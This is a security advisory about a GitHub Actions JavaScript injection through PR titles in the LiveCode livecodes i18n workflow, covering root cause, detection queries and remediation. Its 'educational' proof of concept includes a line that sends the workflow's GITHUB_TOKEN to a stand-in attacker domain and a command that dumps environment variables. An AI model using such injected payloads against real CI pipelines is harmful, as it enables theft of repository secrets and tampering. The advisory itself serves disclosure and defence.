LiveCode – CI Secret Exfiltration via GitHub Actions JavaScript Injection (PR Title)
CVE ID: CVE-2026-27701
Product: LiveCode (livecodes repository – GitHub Actions workflow i18n-update-pull)
CVSS Score: 8.8 (High)
Severity: High
Attack Vector: Remote (via Pull Request submission)
Attack Complexity: Low
Privileges Required: None (attacker only needs ability to open a PR)
User Interaction: Required (workflow triggered by PR event)
Scope: Changed (code execution within CI context)
Impact: Confidentiality – High | Integrity – High | Availability – Low
Explotability: Practical if workflows process untrusted PR metadata
Public Exploit Availability: No confirmed public weaponized exploit repository at time of writing; vulnerability is reproducible for research and defensive validation
Overview
A code injection vulnerability was identified in a GitHub Actions workflow used by the LiveCode project. The affected workflow (i18n-update-pull) utilized actions/github-script and directly embedded the Pull Request title inside a JavaScript block using GitHub template interpolation.
Because the PR title was inserted into executable JavaScript without sanitization or safe handling, an attacker-controlled title could inject arbitrary JavaScript code. That injected code would execute inside the GitHub Actions runner environment under the workflow’s token permissions.
This effectively allowed remote code execution within CI and enabled potential exfiltration of repository secrets or abuse of GitHub API permissions assigned to the workflow token.
Technical Root Cause
The vulnerability originated from unsafe interpolation of user-controlled data into executable JavaScript.
Example of the vulnerable pattern:
uses: actions/github-script@v7
with:
script: |
const prTitle = `i18n: ${{ github.event.issue.title }}`;
Key issue:
${{ github.event.issue.title }}is evaluated before execution.- The resulting string becomes part of JavaScript source code.
- If the PR title contains JavaScript-breaking syntax (backticks, quotes, template expressions, semicolons), code execution may occur.
- No escaping or encoding was performed.
Because GitHub Actions runners execute JavaScript in a Node.js environment with access to:
GITHUB_TOKEN- Environment variables
- Repository APIs
- Network connectivity
Injected code could:
- Call GitHub REST APIs
- Modify issues or PRs
- Push commits
- Read repository contents
- Send data externally via HTTPS
Attack Scenario
Step-by-step exploitation flow:
- Attacker forks the repository.
- Attacker submits a Pull Request.
- Malicious payload is embedded inside PR title.
- Workflow triggers on PR event.
- GitHub template engine injects PR title into JavaScript source.
- JavaScript injection executes inside CI runner.
- Attacker-controlled logic runs with CI token permissions.
Proof of Concept (Educational)
The vulnerability relies on breaking out of the JavaScript string context.
A malicious PR title could conceptually:
- Close the existing string
- Inject arbitrary JavaScript
- Resume syntax to avoid detection
Example of how injection logic works conceptually:
<closing backtick or quote>
<malicious JavaScript>
<comment or syntax balancing>
Potential impact demonstration (lab use only):
- Reading environment variables: console.log(process.env);
- Making outbound network request: require(“https”).get(“https://attacker-domain.com?data=” + process.env.GITHUB_TOKEN);
No public fully automated exploit kit has been confirmed, but replication in a test repository is straightforward for defensive validation.
Testing must only be performed in isolated environments with disposable tokens.
Impact Assessment
Confidentiality Impact
- Exposure of CI environment variables
- Potential leakage of GitHub tokens
- Possible access to private repository contents
Integrity Impact
- Unauthorized issue or PR manipulation
- Repository content modification (if permissions allow)
- Malicious commits under bot identity
Availability Impact
- Limited, unless malicious code intentionally disrupts workflow runs
MITRE ATT&CK Mapping
- T1059.007 – Command and Scripting Interpreter: JavaScript
- T1567 – Exfiltration Over Web Service
- T1552 – Unsecured Credentials
- T1195 – Supply Chain Compromise (if abused in CI/CD pipeline)
Detection and Threat Hunting
Log Sources
- GitHub Audit Logs
- GitHub Actions Workflow Logs
- Runner Network Logs (egress monitoring)
- Proxy/Firewall Logs
- SIEM Ingested GitHub Events API
- Cloud provider logs (if self-hosted runners)
Detection Rules and Queries
1. Repository Static Analysis Detection
Search for unsafe interpolation patterns:
git grep -n '\${{ github.event.issue.title }}' .github/workflows/
git grep -n '\${{ github.event.pull_request.title }}' .github/workflows/
git grep -n 'actions/github-script' .github/workflows/
Review any script blocks containing ${{ github.event.* }}.
2. GitHub Audit Log Detection
Query Logic (Generic API-based Query)
Look for unusual API calls from workflow bot account:
actor:github-actions[bot]
AND action IN (repo.create, repo.push, secret.access, issue.edit, pr.edit)
AND created_at within 5 minutes of pull_request event
3. Suspicious Outbound Traffic from Runner
If self-hosted runners are used:
source_ip:runner_ip_range
AND http_method:POST
AND destination_domain NOT IN (approved_domains_list)
AND timestamp within workflow_execution_window
4. Workflow Behavior Correlation
Detect PR-triggered workflow performing write operations:
event_name:pull_request
AND workflow_name:"i18n-update-pull"
AND github_token_permission:write
5. Unusual Environment Variable Access
Search workflow logs for:
process.env
console.log(process.env)
require("https")
require("http")
child_process
Indicators of Compromise
- Unexpected outbound HTTPS calls during workflow execution
- CI bot performing unusual repository modifications
- PR-triggered workflows modifying branches
- Base64-encoded strings in workflow logs
- Unexpected JavaScript syntax errors during workflow runs
Remediation
Immediate Actions
- Apply official patch to affected workflow.
- Rotate GitHub tokens used in CI.
- Review audit logs for suspicious bot activity.
- Restrict workflow token permissions.
Secure Coding Practices for GitHub Actions
- Never inline untrusted data into executable JavaScript.
- Pass user data via environment variables.
- Access via
process.env. - Use strict
permissions:block in workflow YAML. - Avoid granting write permissions to PR-triggered workflows.
- Separate trusted and untrusted workflow triggers.
Example secure pattern:
env:
PR_TITLE: ${{ github.event.issue.title }}
Then inside script:
const prTitle = process.env.PR_TITLE;
Hardening Recommendations
- Use least privilege for
GITHUB_TOKEN - Disable workflow writes for forked PRs
- Enable branch protection rules
- Require maintainer approval for workflow runs
- Use separate workflows for write operations
- Implement outbound network monitoring for runners
Official Patch
The vulnerability has been fixed by modifying the workflow to avoid unsafe JavaScript interpolation.
Official patch commit:
https://github.com/live-codes/livecodes/commit/e151c64c2bd80d2d53ac1333f1df9429fe6a1a11
Organizations using similar workflow patterns are advised to review and patch immediately.
Final Assessment
This vulnerability highlights a common CI/CD security anti-pattern: treating user-controlled metadata as executable code. While the exploit requires only a Pull Request submission, the impact can extend to full repository compromise depending on workflow permissions.
The risk is particularly significant for open-source projects that automatically run workflows on external contributions.
Strict separation between untrusted input and executable script logic must be enforced across all CI pipelines.
